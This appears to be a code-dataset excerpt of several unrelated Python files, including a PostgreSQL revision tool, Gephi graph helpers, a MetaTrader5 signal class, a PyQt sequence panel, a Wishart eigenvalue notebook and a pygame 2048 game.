cr.execute('CREATE DATABASE \"%s\" WITH TEMPLATE \"%s\"', (AsIs(targetdb), AsIs(self.db)))\n self.set('revision', revision + 1)\n self.set('parent', revision)\n self.rem('tag')\n self.rem('message')\n\n def revert(self, parent=None, tag=None):\n \"\"\" drop the current db and start back from this parent\n (or the current parent if no parent is specified)\n \"\"\"\n if parent is None and tag is None: # revert to last\n parent = self.parent()\n if tag: # revert to tag\n tagfound = [r for r in self.log() if r.get('tag') == tag]\n if tagfound:\n parent = tagfound[0]['revision']\n else:\n return\n # store revision because we'll drop\n currevision = self.revision()\n sourcedb = '*'.join([self.db, str(parent)])\n with self.connect() as cn, cn.cursor() as cr:\n cn.autocommit = True\n self._disconnect(cr, self.db)\n with self.connect('postgres') as cn, cn.cursor() as cr:\n cn.autocommit = True\n # check that the source db exists to avoid dropping too early\n cr.execute('SELECT count(*) FROM pg_catalog.pg_database where datname=%s', (sourcedb,))\n if not cr.fetchone()[0]:\n raise NoTemplate('Cannot revert because the source db does not exist')\n cr.execute('DROP DATABASE \"%s\"', (AsIs(self.db),))\n cr.execute('CREATE DATABASE \"%s\" WITH TEMPLATE \"%s\"', (AsIs(self.db), AsIs(sourcedb)))\n self.set('revision', currevision)\n self.set('parent', parent)\n self.rem('tag')\n self.rem('message')\n\n def log(self):\n \"\"\" return a list of previous revisions, each revision being a dict with needed infos\n \"\"\"\n log = []\n with self.connect() as cn, cn.cursor() as cr:\n req = 'SELECT datname FROM pg_catalog.pg_database WHERE datname like %s'\n cr.execute(req, (self.db + '*%',))\n dbnames = cr.fetchall()\n for db in [d[0] for d in dbnames] + [self.db]:\n with self.connect(db) as cn, cn.cursor() as cr:\n log.append({\n 'db': db,\n 'revision': int(self.get('revision', cr)),\n 'parent': int(self.get('parent', cr)),\n })\n tag = self.get('tag', cr)\n if tag:\n log[-1]['tag'] = tag\n msg = self.get('message', cr)\n if msg:\n log[-1]['message'] = msg\n return sorted(log, key=lambda x: x['revision'], reverse=True)\n\n def purge(self, what, confirm=False):\n \"\"\" purge the revisions\n ``what`` can be::\n - ``all``: drop all revisions\n - ``keeptags``: drop all untagged revisions\n \"\"\"\n # first get what will be purged, then confirm\n to_purge = [i for i in self.log() if i['db'] != self.db]\n if what == 'all':\n pass\n elif what == 'keeptags':\n to_purge = [i for i in to_purge if 'tag' not in i]\n else:\n raise NotImplementedError('Bad purge command')\n if confirm:\n for logitem in to_purge:\n self.dropdb(logitem['db'])\n return to_purge\n\n def tag(self, tag=None, revision=None, delete=False):\n \"\"\" tag a specific revision or the current one by default\n \"\"\"\n tags = [r for r in self.log() if 'tag' in r]\n if delete:\n if tag in [r.get('tag') for r in tags]:\n db = [r['db'] for r in tags if r.get('tag') == tag][0]\n with self.connect(db) as cn, cn.cursor() as cr:\n return self.rem('tag', cr)\n return\n if tag is None and revision is None:\n return tags\n if tag is not None and tag in [r.get('tag') for r in tags]:\n raise TagExists('This tag already exists')\n if revision is None:\n revision = self.revision()\n if self.revision() == revision:\n db = self.db\n else:\n db = '%s*%s' % (self.db, revision)\n with self.connect(db) as cn, cn.cursor() as cr:\n self.set('tag', tag, cr)\n","repo_name":"meiffret/fm_media_odoo11","sub_path":"venv/lib/python3.5/site-packages/odb/odb.py","file_name":"odb.py","file_ext":"py","file_size_in_byte":8323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37130889735","text":"x = []\nwhile True:\n v = int(input(\"Digite um número (valor negativo para a entrada de Dados): \"))\n if v>=0:\n x.append(v)\n else:\n break \nfor i in range(0, len(x) - 1):\n for j in range(i+1, len(x)):\n if x[i] > x[j]:\n x[i], x[j] = x[j], x[i]\nprint(x)\n","repo_name":"marceloarantes19/estruturaDeDados2022","sub_path":"revisao/vetores/exercicio9.py","file_name":"exercicio9.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"73107748088","text":"# -*- coding: utf-8 -*-\n\n\ndef find_neighbors(degree_sep, node):\n \"\"\"\n find a nodes neighbors to n degrees of seperation.\n ------------\n params - degree_sep: degrees of seperation. integer > 1\n node: node id\n ------------\n return - a set of neighbors to the nth degree with no 'NoneType'\n \"\"\"\n neighbors = set([])\n newset = set([])\n\n # update a set for neighbors iteration.\n # updat direct neighbors into the neighbors list\n newset.update(node.neighbors)\n neighbors.update(node.neighbors)\n\n # drives the following iterations\n # n-1 because 1st degree neighbors are automatically updated to set\n for x in range(degree_sep-1):\n\n # keeps track of next neighbor set for iteration with a helperset\n helperset = set([])\n\n # finds neighbors of newset and updates to the helperset\n # checks newset for 'NoneType' and removes them\n for neighbor in newset:\n if neighbor:\n helperset.update(neighbor.neighbors)\n # changes the helperset into newset for next round of iterations\n newset = helperset\n\n # appends neighbors for each degree of seperation to the masterlist\n neighbors.update(newset)\n\n #filter final NoneType\n return filter(bool, neighbors)\n\n\ndef att_filter(myset, att_type, att):\n nodes = []\n visible = g.filter(att_type == att)\n for node in myset:\n if node in visible.nodes:\n nodes.append(node)\n nodes = set(nodes)\n return nodes\n\n\ndef filter_set_type(myset, att):\n nodes = []\n for node in myset:\n if node.NodeType == att:\n nodes.append(node)\n nodes = set(nodes)\n return nodes\n\n\ndef type_neighbors(att_type, att, myset):\n nodes = att_filter(att_type, att, myset)\n neighbors = set(nodes)\n for node in nodes:\n neighbors.update(node.neighbors)\n return neighbors\n\n\ndef fix_set(myset):\n \"\"\"\n fixes the position of a set of nodes in the graph\n --------------------------\n param - myset: any set of nodes\n \"\"\"\n for node in myset:\n node.fixed = True\n\n\ndef color_set(myset, color):\n \"\"\"\n color a set of nodes\n -----------------\n params - set: the set of nodes to be colored\n color: the desired color\n \"\"\"\n for node in myset:\n node.color = color\n\n\ndef size_set(myset, size):\n \"\"\"\n control the size of a set of nodes\n -----------------\n params - set1: the set of nodes to be sized\n size: the desired size\n \"\"\"\n for node in myset:\n if node:\n node.size = size\n\n\ndef return_label(myset):\n \"\"\"\n return the labels of a set of nodes\n ---------------\n param - set: a set of nodes\n -----------\n return - the labels of a set of nodes\n \"\"\"\n labellist = []\n for node in myset:\n labellist.append(node.label)\n return labellist\n\n\ndef set_intersect(set1, set2):\n \"\"\"\n find the intersecting nodes of two sets\n ________________\n params - set1, set 2: subsets of nodes in a graph\n ____________\n return - the intersecting set\n \"\"\"\n return set(set(set1) & set(set2))\n","repo_name":"CulturePlex/Preliminares","sub_path":"gephi.py","file_name":"gephi.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11647521746","text":"import pandas as pd\nimport MetaTrader5 as mt5\nimport plotly.graph_objects as go\n\nmt5.initialize()\n\ntrading_hours = [(10, 15)]\n\n\nclass Signals:\n # Define function to calculate EMA\n def calculate_ema(self, data, length):\n return data['close'].ewm(span=length).mean()\n\n # Define function to calculate ATR\n def calculate_atr(self, data, period):\n high_low = data['high'] - data['low']\n high_close = (data['high'] - data['close'].shift()).abs()\n low_close = (data['low'] - data['close'].shift()).abs()\n ranges = pd.concat([high_low, high_close, low_close], axis=1)\n true_range = ranges.max(axis=1)\n return true_range.rolling(period).mean()\n\n def calculate_rsi(self, series, window=14):\n close_diff = series.diff(1)\n positive_change = close_diff.where(close_diff > 0, 0)\n negative_change = close_diff.where(close_diff < 0, 0)\n average_gain = positive_change.rolling(window).mean()\n average_loss = negative_change.rolling(window).mean()\n rs = average_gain / average_loss\n rsi = 100 - (100 / (1 + rs))\n return rsi\n\n # Define function to check trading hours\n def check_trading_hours(self, hour, minute):\n for start, end in trading_hours:\n if start <= hour < end:\n return True\n return False\n\n # Define function to place order\n def place_order(self, symbol, order_type, volume, price, stop_loss, take_profit):\n if order_type == 'buy':\n trade_type = mt5.ORDER_TYPE_BUY\n elif order_type == 'sell':\n trade_type = mt5.ORDER_TYPE_SELL\n else:\n print('Invalid order type')\n return\n\n request = {\n 'action': mt5.TRADE_ACTION_DEAL,\n 'symbol': symbol,\n 'volume': volume,\n 'type': trade_type,\n 'price': price,\n 'sl': stop_loss,\n 'tp': take_profit,\n 'magic': 123456,\n 'comment': 'Trade bot order',\n 'type_time': mt5.ORDER_TIME_GTC,\n 'type_filling': mt5.ORDER_FILLING_IOC,\n }\n\n result = mt5.order_send(request)\n\n return result\n\n def check_signal(self, symbol, show_plot=False):\n ema_length = 100\n pip_threshold = 10\n lookback = 100\n atr_period = 14\n gap_window = 100\n bar_limit = 1000\n data = pd.DataFrame(mt5.copy_rates_from_pos(symbol, mt5.TIMEFRAME_M15, 0, lookback))\n # Calculate EMA\n if data.shape[0] < ema_length:\n ema_length = data.shape[0]\n if data.shape[0] < gap_window:\n gap_window = data.shape[0]\n data['ema'] = self.calculate_ema(data, ema_length)\n # Calculate gap\n data['gap'] = data['close'] - data[\"ema\"]\n # Calculate longest gap\n data[\"longest_gap\"] = data[\"gap\"].rolling(window=gap_window).max()\n # Calculate ATR\n data['atr'] = self.calculate_atr(data, atr_period)\n data[\"buy_condition\"] = data[\"gap\"] < 0\n data[\"sell_condition\"] = data[\"gap\"] > 0\n data[\"wick_size\"] = abs(data[\"high\"] - data[\"low\"]) / mt5.symbol_info(symbol).point\n data[\"buy_wick_condition\"] = data[\"buy_condition\"] & (data[\"wick_size\"] >= pip_threshold)\n data[\"sell_wick_condition\"] = data[\"sell_condition\"] & (data[\"wick_size\"] >= pip_threshold)\n data[\"buy_wick_count\"] = data[\"buy_wick_condition\"].rolling(window=bar_limit).sum()\n data[\"sell_wick_count\"] = data[\"sell_wick_condition\"].rolling(window=bar_limit).sum()\n data[\"fib_59\"] = (\n data[\"low\"].shift(1)\n + (data[\"high\"].shift(1) - data[\"low\"].shift(1)) * 0.59\n )\n data[\"fib_163\"] = (\n data[\"low\"].shift(1)\n + (data[\"high\"].shift(1) - data[\"low\"].shift(1)) * 1.63\n )\n data['rsi'] = self.calculate_rsi(data[\"close\"], window=14)\n # Get latest bar\n latest_bar = data.iloc[-1]\n symbol_data = mt5.symbol_info(symbol)\n if show_plot:\n # Ensure the data is sorted by index before plotting\n candle_data = data.sort_index()\n buy_signals = data.loc[data[\"buy_wick_condition\"], :]\n sell_signals = data.loc[data[\"sell_wick_condition\"], :]\n plot_data(candle_data, buy_signals, sell_signals)\n\n if data[\"buy_wick_condition\"].any():\n entry_price = symbol_data.ask\n return {'symbol': symbol, 'trade_type': 'buy', 'entry_price': entry_price, 'stop_loss': 0,\n 'take_profit': 0}\n elif data[\"sell_wick_condition\"].any():\n entry_price = symbol_data.bid\n return {'symbol': symbol, 'trade_type': 'sell', 'entry_price': entry_price, 'stop_loss': 0,\n 'take_profit': 0}\n return None\n\n\ndef plot_data(candle_data, buy_signals=None, sell_signals=None, indicators=None):\n \"\"\"\n The plot_data function takes a dataframe of candle data and plots the data and indicators.\n :param candle_data: pd.DataFrame: The dataframe of candle data\n :param buy_signals: pd.DataFrame or None: DataFrame containing buy signals, or None if no buy signals\n :param sell_signals: pd.DataFrame or None: DataFrame containing sell signals, or None if no sell signals\n :param indicators: List[str]: List of indicators or data columns to plot\n :return: None\n \"\"\"\n if indicators is None:\n indicators = [\"close\", \"ema\", \"fib_59\", \"fib_163\"]\n\n fig = go.Figure(data=[go.Candlestick(x=candle_data.index,\n open=candle_data['open'],\n high=candle_data['high'],\n low=candle_data['low'],\n close=candle_data['close'],\n )])\n\n # Plot buy signals\n if buy_signals is not None and len(buy_signals) > 0:\n prev_buy_signal_index = None\n for index, row in buy_signals.iterrows():\n if prev_buy_signal_index is None or index - prev_buy_signal_index > 1:\n buy_marker = go.Scatter(x=[index], y=[row['close']],\n mode='markers', name='Buy Signal', marker_symbol='triangle-up',\n marker=dict(color='green', size=15),\n text=\"Buy Signal\", textposition=\"bottom center\")\n fig.add_trace(buy_marker)\n prev_buy_signal_index = index\n elif prev_buy_signal_index is not None and index - prev_buy_signal_index == 1:\n prev_buy_signal_index = index\n\n # Plot sell signals\n if sell_signals is not None and len(sell_signals) > 0:\n prev_sell_signal_index = None\n for index, row in sell_signals.iterrows():\n if prev_sell_signal_index is None or index - prev_sell_signal_index > 1:\n sell_marker = go.Scatter(x=[index], y=[row['close']],\n mode='markers', name='Sell Signal', marker_symbol='triangle-down',\n marker=dict(color='red', size=15),\n text=\"Sell Signal\", textposition=\"top center\")\n fig.add_trace(sell_marker)\n prev_sell_signal_index = index\n elif prev_sell_signal_index is not None and index - prev_sell_signal_index == 1:\n prev_sell_signal_index = index\n\n for indicator in indicators:\n fig.add_trace(go.Scatter(x=candle_data.index, y=candle_data[indicator], name=indicator))\n\n fig.update_layout(title=\"Candle Data with Buy/Sell Signals\", xaxis_title=\"Date\", yaxis_title=\"Value\")\n fig.show()\n\n\n","repo_name":"JRBusiness/wiggy_conversion","sub_path":"app/strategy/signal.py","file_name":"signal.py","file_ext":"py","file_size_in_byte":7768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37859514007","text":"__author__ = 'alefur'\n\nfrom functools import partial\n\nimport numpy as np\nfrom PyQt5.QtWidgets import QCheckBox\nfrom sequencePanel.widgets import IconButton, EyeButton\n\n\nclass SubCommand(object):\n def __init__(self, subId, cmdStr, didFail, returnStr):\n self.id = subId\n self.cmdStr = cmdStr\n self.anomalies = ''\n self.returnStr = returnStr\n\n self.visit = self.decode(returnStr)\n self.setStatus(int(didFail))\n\n @property\n def isActive(self):\n return self.status == 'active'\n\n @property\n def isValid(self):\n return self.status == 'valid'\n\n @property\n def visitStart(self):\n return self.visit\n\n @property\n def visitEnd(self):\n return self.visit\n\n def setActive(self):\n self.status = 'active'\n\n def setStatus(self, didFail):\n if didFail == -1:\n self.status = 'valid'\n elif didFail == 0:\n self.status = 'finished'\n elif didFail == 1:\n self.status = 'failed'\n elif didFail == 2:\n self.status = 'cancelled'\n else:\n raise ValueError(f'unknown status: {didFail}')\n\n def decode(self, returnStr):\n try:\n __, keys = returnStr.split('fileids=')\n visit, __, mask = keys.split(',')\n except ValueError:\n return -1\n\n return int(visit)\n\n\nclass CmdRow(object):\n color = {\"init\": (\"#FF7D7D\", \"#000000\"), \"valid\": (\"#7DFF7D\", \"#000000\"), \"active\": (\"#4A90D9\", \"#FFFFFF\"),\n \"finished\": (\"#5f9d63\", \"#FFFFFF\"), \"failed\": (\"#9d5f5f\", \"#FFFFFF\")}\n\n def __init__(self, panelwidget, name, comments, cmdStr, seqtype=''):\n self.status = 'init'\n self.id = -1\n self.panelwidget = panelwidget\n self.seqtype = seqtype\n self.name = name\n self.comments = comments\n self.cmdStr = cmdStr\n self.cmds = dict()\n self.returnStr = ''\n\n self.valid = QCheckBox()\n self.valid.stateChanged.connect(self.setValid)\n self.colorCheckbox()\n\n self.buttonMoveUp = IconButton(iconFile='arrow_up2.png')\n self.buttonMoveUp.clicked.connect(self.moveUp)\n\n self.buttonMoveDown = IconButton(iconFile='arrow_down2.png')\n self.buttonMoveDown.clicked.connect(self.moveDown)\n\n self.buttonDelete = IconButton(iconFile='delete.png')\n self.buttonDelete.clicked.connect(self.remove)\n\n self.buttonEye = EyeButton()\n self.buttonEye.clicked.connect(partial(self.showSubcommands))\n\n @property\n def fullCmd(self):\n name = f'name=\"{self.name}\"' if self.name else ''\n comments = f'comments=\"{self.comments}\"' if self.comments else ''\n return f'{self.cmdStr} {name} {comments}'.strip()\n\n @property\n def info(self):\n return dict(name=self.name, comments=self.comments, cmdStr=self.cmdStr)\n\n @property\n def subcommands(self):\n return [self.cmds[k] for k in sorted(self.cmds.keys())]\n\n @property\n def isValid(self):\n return self.status == 'valid'\n\n @property\n def isActive(self):\n return self.status == 'active'\n\n @property\n def showSub(self):\n return self.buttonEye.state\n\n @property\n def nbRows(self):\n nbRows = len(self.subcommands) if (self.showSub and self.subcommands) else 2\n nbRows = 2 if nbRows < 2 else nbRows\n return nbRows\n\n @property\n def height(self):\n isActive = [subcommand.isActive for subcommand in self.subcommands]\n height = (np.argmax(isActive) + 0.5) if (self.showSub and isActive) else 1\n return height\n\n @property\n def visits(self):\n return [subcommand.visit for subcommand in self.subcommands if subcommand.visit != -1]\n\n @property\n def visitStart(self):\n if not self.visits:\n return -1\n return min(self.visits)\n\n @property\n def visitEnd(self):\n if not self.visits:\n return -1\n return max(self.visits)\n\n @property\n def registered(self):\n return self.status in ['finished', 'failed'] and self.visits\n\n def colorCheckbox(self):\n self.valid.setStyleSheet(\"QCheckBox {background-color:%s};\" % CmdRow.color[self.status][0])\n\n def setStatus(self, status):\n self.status = status\n self.colorCheckbox()\n\n self.panelwidget.updateTable()\n\n def setActive(self):\n self.setStatus(status='active')\n self.valid.setEnabled(False)\n\n self.panelwidget.sendCommand(fullCmd=self.fullCmd,\n timeLim=7 * 24 * 3600,\n callFunc=self.handleResult)\n\n def setFinished(self):\n self.valid.setEnabled(False)\n self.setStatus(status='finished')\n\n def setFailed(self):\n self.valid.setEnabled(False)\n self.setStatus(status='failed')\n\n def setValid(self, state):\n status = \"valid\" if state == 2 else \"init\"\n self.setStatus(status=status)\n\n def showSubcommands(self, *args, bool=None):\n state = not self.buttonEye.state if bool is None else bool\n\n self.buttonEye.setState(state=state)\n self.panelwidget.updateTable()\n\n def handleResult(self, resp):\n reply = resp.replyList[-1]\n returnStr = reply.keywords.canonical(delimiter=';')\n code = resp.lastCode\n\n if code in [':', 'F']:\n self.terminate(code=code, returnStr=returnStr)\n else:\n self.updateInfo(reply=reply)\n\n self.panelwidget.logLayout.logArea.printResponse(resp=resp)\n\n def updateInfo(self, reply):\n\n if 'sps_sequence' in reply.keywords:\n self.setSPSSequence(*reply.keywords['sps_sequence'].values)\n\n elif 'sequence' in reply.keywords:\n self.setSequence(*reply.keywords['sequence'].values)\n\n elif 'experiment' in reply.keywords:\n self.setExperiment(*reply.keywords['experiment'].values)\n\n elif 'subCommand' in reply.keywords:\n self.updateSubCommand(*reply.keywords['subCommand'].values)\n\n def terminate(self, code, returnStr):\n self.returnStr = returnStr\n self.setFinished() if code == ':' else self.setFailed()\n\n self.panelwidget.scheduler.nextSVP()\n\n def setSPSSequence(self, sequenceId, seqtype, cmdStr, name, comments, status, *args):\n\n self.id = int(sequenceId)\n self.seqtype = seqtype\n self.name = name\n self.comments = comments\n self.cmdStr = cmdStr\n self.buttonEye.setEnabled(True)\n\n self.panelwidget.updateTable()\n\n def setSequence(self, sequenceId, groupId, seqtype, name, comments, cmdStr, status, output, *args):\n\n self.id = int(sequenceId)\n self.seqtype = seqtype\n self.name = name\n self.comments = comments\n self.cmdStr = cmdStr\n self.buttonEye.setEnabled(True)\n\n self.panelwidget.updateTable()\n\n def setExperiment(self, dbname, experimentId, seqtype, cmdStr, name, comments):\n\n self.dbname = dbname\n self.id = int(experimentId)\n self.seqtype = seqtype\n self.name = name\n self.comments = comments\n self.cmdStr = cmdStr\n self.buttonEye.setEnabled(True)\n\n self.panelwidget.updateTable()\n\n def updateSubCommand(self, expId, subId, *args):\n subId = int(subId)\n self.cmds[subId] = SubCommand(subId, *args)\n\n actives = [subcommand for subcommand in self.subcommands if subcommand.isActive]\n valids = [subcommand for subcommand in self.subcommands if subcommand.isValid]\n\n if actives:\n return\n\n if valids:\n valids[0].setActive()\n\n self.panelwidget.updateTable()\n\n def moveUp(self):\n cmdRows = self.panelwidget.cmdRows\n\n new_ind = cmdRows.index(self) - 1\n new_ind = 0 if new_ind < 0 else new_ind\n cmdRows.remove(self)\n cmdRows.insert(new_ind, self)\n\n self.panelwidget.updateTable()\n\n def moveDown(self):\n cmdRows = self.panelwidget.cmdRows\n\n new_ind = cmdRows.index(self) + 1\n new_ind = len(cmdRows) - 1 if new_ind > len(cmdRows) - 1 else new_ind\n cmdRows.remove(self)\n cmdRows.insert(new_ind, self)\n\n self.panelwidget.updateTable()\n\n def remove(self):\n if not self.isActive:\n cmdRows = self.panelwidget.cmdRows\n cmdRows.remove(self)\n\n self.panelwidget.updateTable()\n","repo_name":"Subaru-PFS/ics_sequencePanel","sub_path":"python/sequencePanel/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":8424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24659350332","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# **Centro de investigación en Matemáticas A.C**\n# \n# **Temas Selectos en Estadística**\n# \n# **Hairo Ulises Miranda Belmonte**\n# \n# **Tarea 2. Distribución de Wishart y Marcenko-Pastur**\n# \n# **23 de Agosto del 2019**\n\n# # Distribución de Wishart y Marcenko-Pastur\n\n# ## Ejercicio 1 \n# \n# * ¿Como lucen los eigenvalores de una matriz de covarianza gaussiana?\n# \n# Realice el siguiente experimiento (Izenman, 2da edició):\n# \n# * Genere una matriz Z de dimensión $p × n$ cuyas entradas sean iid $N(0, 1)$\n# \n# * Sea D una matriz diagonal $p × p$, y $X = DZ$\n# \n# * Sea S = $n^{−1}XX'$ la matriz de covarianza muestral de dimensión $p × p$ De esta manera $XX' ∼ Wp(n, D2)$\n# \n# * Simule y grafique en orden descendente los eigenvalores de la matriz S\n# para los casos $p = 30$, $n ∈ {30, 300}$, y $D^2 = diag(12, 11, 10, 9, 8, 7, 3, 3, 3, . . . , 3)$\n# \n# * ¿Cuantos componentes principales retendría en cada caso?\n\n# Simulación \n\n# In[374]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style(\"darkgrid\")\n\np = 30\nn = [30, 300]\nMatriz = []\nfor i in n :\n Z = np.random.normal(0, 1, (p,i))\n a1 = np.array([12,11,10,9,8,7])\n a2 = np.repeat(3, p-6)\n D2 = np.diag(np.concatenate((a1,a2)))\n D = np.sqrt(np.diag(np.concatenate((a1,a2))))\n X = np.dot(D,Z)\n S = np.dot(X, X.T)/ i\n v, w = np.linalg.eigh(S)\n temp = np.sort(v)[::-1]\n Matriz.append(temp)\n\n\n# Visualización\n\n# De la simulación de las matrices gaussianas, se estima la matriz de covarinza de cada una de ellas y se calculan sus valores y vectores propios.\n# \n# Se ordenan los valores propios de orden decendente y se gráfica sus respectivos *scrrplot* (i.e., para $n=30, 300$)\n\n# In[375]:\n\n\nplt.subplot(1, 2, 1)\nplt.plot(Matriz[0], 'o', c=\"black\")\nplt.plot(Matriz[0], '-', c=\"black\")\nplt.title('Screeplot n = [30, 300]')\nplt.ylabel('Valores propios')\n\nplt.subplot(1, 2, 2)\nplt.plot(Matriz[1], 'o', c=\"black\")\nplt.plot(Matriz[1], '-', c=\"black\")\nplt.ylim((0,20))\nplt.xlabel('# Valores propios')\n\n\nplt.show()\n\n\n# En el gráfico de la izquierda se observan los valores propios cuando se tiene $n=30$, en el de la derecha cuando $n=300$. Siguiendo el críterio del \"codo\", podemos conservar entre 8 a 10 componentes.\n\n# In[376]:\n\n\nimport pandas as pd\n\nvar_exp = [Matriz[0][:i+1].sum()/(Matriz[0].sum()) for i in range(10)]\nvalor_prop = list(range(10))\n\npd.DataFrame({'Varianza explicada': var_exp}, \n index = ['1','2','3','4','5','6','7','8','9','10'])\n\n \n\n\n# Con base a tomar el número de las componentes que expliquen el $80\\%$ se concluye que 10 son suficientes.\n\n# ## Ejercicio 2\n# \n# * Distribución de los valores propios de la matriz aleatoria $XX'\\sim W_p(n, I_p)$\n# \n# * Gráfique la distribución de valores propios por medio de Monte Carlo, considerando el caso en que $n>p$\n\n# Simulación\n\n# In[377]:\n\n\nfinal = []\np = 30\nn = [30, 300]\n\nfor j in n:\n valores_p = []\n for i in range(1000):\n X = np.random.normal(0, 1, (p,j))\n temp2 = np.dot(X,X.T)/ j\n v, w = np.linalg.eigh(temp2)\n valores_p.append(v.tolist())\n flattened = [val for sublist in valores_p for val in sublist]\n final.append(flattened)\n\n\n# Visualización\n\n# Se realizan mil simulaciones de una matriz aleatoria cuya distribución es normal con $\\mu = 1$ y $\\sigma^2 = 0$. Se estima a cada una su matriz de covarianza y se calculan sus respectivos valores propios. Al tener todos los valores propios para todas las simulaciones se gráfica el histograma para aproximar la función de densidad de los valores propios de la matrix aleatoria cuya distribución es la Wishart.\n# \n# Lo anterior se hace para el varios tamaños de la matriz, la primera para $n=10$; la segunda, para $n =300$\n\n# Función de distribución a simular con Monte Carlo\n\n# $$\\rho(\\lambda_1,...,\\lambda_1)=\\frac{1}{Z_p}e^{\\frac{-\\Sigma_{p}^{i=1}\\lambda_i}{2}}\\Pi_{i=1}^{p}\\lambda_i^{\\alpha/2}\\Pi_{j\", np.diag(C[0]).mean())\nprint(\"La sd de los elementos diagonales con n =10 ->\", np.sqrt(np.diag(C[0]).var()))\n\nprint(\"\\nLa media de los elementos diagonales con n =1000 ->\", np.diag(C[1]).mean())\nprint(\"La sd de los elementos diagonales con n =1000:\", np.sqrt(np.diag(C[1]).var()))\n\n\n# Se observa el el valor medio cuando \"n\" incrementa sigue fluctuando sobre el valor de uno, sin embargo, las varianza tiende a disminuir en proporción de uno sobre \"n\"\n\n# * Media y desviación estándar de los elemenntos no diagonales\n\n# In[387]:\n\n\nindex = ~np.eye(C[0].shape[0],dtype=bool)\n\nprint(\"La media de los elementos no diagonales con n =10 ->\",C[0][index].mean())\nprint(\"La sd de los elementos no diagonales con n =10 ->\", np.sqrt(C[0][index].var()))\n\nprint(\"\\nLa media de los elementos no diagonales con n =1000 ->\", C[1][index].mean())\nprint(\"La sd de los elementos no diagonales con n =1000:\", np.sqrt(C[1][index].var()))\n\n\n# En el caso de los elementos fuera de la diagonal la media tiende a incrementar conforme \"n\" aumenta, y la desviación estándar reduce al mismo factor que los elementos de la diagonal\n","repo_name":"hairo1421/Maestria-Computo-Estadistico","sub_path":"05 - Tercer Semestre Temas en Estadística/Matrices Aleatorias/Tarea 2 Distribución de Wishart y Marcenko-Pastur.py","file_name":"Tarea 2 Distribución de Wishart y Marcenko-Pastur.py","file_ext":"py","file_size_in_byte":10647,"program_lang":"python","lang":"es","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"29137153993","text":"import numpy as np\nimport pygame\n\nDisplay = pygame.display.set_mode([201, 201])\n\nBoard = np.zeros((4, 4), dtype=int)\nPreviousBoard = np.zeros((4, 4), dtype=int)\n\ndef NewRandom(Num):\n global Board\n for _ in range(Num):\n if 0 in Board:\n Random = np.random.randint(0, 4, 2)\n while Board[Random[0], Random[1]] != 0:\n Random = np.random.randint(0, 4, 2)\n Board[Random[0], Random[1]] = np.random.choice([2, 4], p=[0.9, 0.1])\n\nNewRandom(2)\n\npygame.init()\npygame.display.set_caption('2048')\n\ndone = False\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\n\nwhile not np.array_equal(PreviousBoard, Board):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n PreviousBoard = Board\n\n # Display\n Display.fill(BLACK)\n\n for i in range(3):\n pygame.draw.line(Display, WHITE, (i * 50 + 50, 0), (i * 50 + 50, 201))\n pygame.draw.line(Display, WHITE, (0, i * 50 + 50), (201, i * 50 + 50))\n\n for i in range(4):\n for j in range(4):\n if Board[j, i] != 0:\n Display.blit(pygame.font.SysFont(\"Raleway\", 24).render(str(Board[j, i]), 1, WHITE), (i * 50 + (4 - len(str(Board[j, i]))) * 5 + 6, j * 50 + 20))\n \n # User Input\n if event.type == pygame.KEYDOWN:\n if (event.key == pygame.K_UP):\n PreviousBoard = Board.copy()\n for _ in range(3):\n for i in reversed(range(3)):\n for j in range(4):\n if Board[i, j] == Board[i + 1, j]:\n Board[i, j] *= 2\n Board[i + 1, j] = 0\n if Board[i, j] == 0:\n Board[i, j] = Board[i + 1, j]\n Board[i + 1, j] = 0\n NewRandom(1)\n\n if (event.key == pygame.K_RIGHT):\n PreviousBoard = Board.copy()\n for _ in range(3):\n for i in range(4):\n for j in range(1, 4):\n if Board[i, j] == Board[i, j - 1]:\n Board[i, j] *= 2\n Board[i, j - 1] = 0\n if Board[i, j] == 0:\n Board[i, j] = Board[i, j - 1]\n Board[i, j - 1] = 0\n NewRandom(1)\n\n if (event.key == pygame.K_DOWN):\n PreviousBoard = Board.copy()\n for _ in range(3):\n for i in range(1, 4):\n for j in range(4):\n if Board[i, j] == Board[i - 1, j]:\n Board[i, j] *= 2\n Board[i - 1, j] = 0\n if Board[i, j] == 0:\n Board[i, j] = Board[i - 1, j]\n Board[i - 1, j] = 0\n NewRandom(1)\n\n if (event.key == pygame.K_LEFT):\n PreviousBoard = Board.copy()\n for _ in range(3):\n for i in range(4):\n for j in reversed(range(3)):\n if Board[i, j] == Board[i, j + 1]:\n Board[i, j] *= 2\n Board[i, j + 1] = 0\n if Board[i, j] == 0:\n Board[i, j] = Board[i, j + 1]\n Board[i, j + 1] = 0\n NewRandom(1)\n\n pygame.display.flip()\n\npygame.quit()","repo_name":"seanmabli/2048","sub_path":"human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73726795450","text":"from typing import List\nfrom .graphqlclient import GraphQLParam, NebMixin\nfrom datetime import datetime\nfrom .common import NebEnum, PageInput, read_value\nfrom .filters import StringFilter, UUIDFilter\nfrom .sorting import SortDirection\nfrom .tokens import TokenResponse\nfrom .issues import Issues\nfrom .updates import UpdateHistory, NPodRecommendedPackage\n\n__all__ = [\n \"BondType\",\n \"BondTransmitHashPolicy\",\n \"BondLACPTransmitRate\",\n \"SetNPodTimeZoneInput\",\n \"NPodSort\",\n \"NPodFilter\",\n \"IPInfoConfigInput\",\n \"NPodSpuInput\",\n \"CreateNPodInput\",\n \"NPod\",\n \"NPodList\",\n \"NPodCustomDiagnostic\",\n \"ExpectedNPodCapacity\",\n 